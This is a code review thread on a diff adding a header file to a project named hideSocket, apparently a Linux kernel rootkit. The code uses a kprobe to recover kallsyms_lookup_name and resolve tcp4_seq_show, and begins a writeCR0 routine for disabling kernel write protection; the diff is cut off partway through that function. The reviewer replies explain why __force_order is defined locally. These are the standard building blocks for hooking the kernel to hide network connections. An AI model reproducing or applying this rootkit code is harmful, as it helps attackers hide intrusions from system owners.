hideSocket/hfiles/hardware.h

```diff
@@ -0,0 +1,50 @@
+
+#include <linux/version.h> 
+
+#ifndef HARDWARE_H
+#define HARDWARE_H
+
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0)
+
+#define KPROBE_LOOKUP 1
+
+#include <linux/kprobes.h>
+static struct kprobe kp = {
+    .symbol_name = "kallsyms_lookup_name"
+};
+#endif
+
+
+typedef unsigned long(*tp_kallsyms_lookup_name)(const char* name);
+unsigned long tcp4_seq_show_address(void)
+{
+#ifdef KPROBE_LOOKUP
+    tp_kallsyms_lookup_name kallsyms_lookup_name;
+ 
+    register_kprobe(&kp);
+   
+    kallsyms_lookup_name = (tp_kallsyms_lookup_name)kp.addr; 
+    unregister_kprobe(&kp);   
+#endif    
+    return kallsyms_lookup_name("tcp4_seq_show");
+}
+
+
+inline void writeCR0(unsigned long cr0) 
+{
+    unsigned long __force_order;
```

Comment:
?

Reply:
Since the latest versions of the kernel the force order value isn't exported, we have to define it ourselves so we can write our own writeCR0 function

Reply:
yeah but how it works?

Reply:
It used to force instructions serialization, it acts as an output for the inline assembly, and it makes the CR register to behave correctly on each read/write operation. It means the memory used by the CR register will be forced to read/write operations.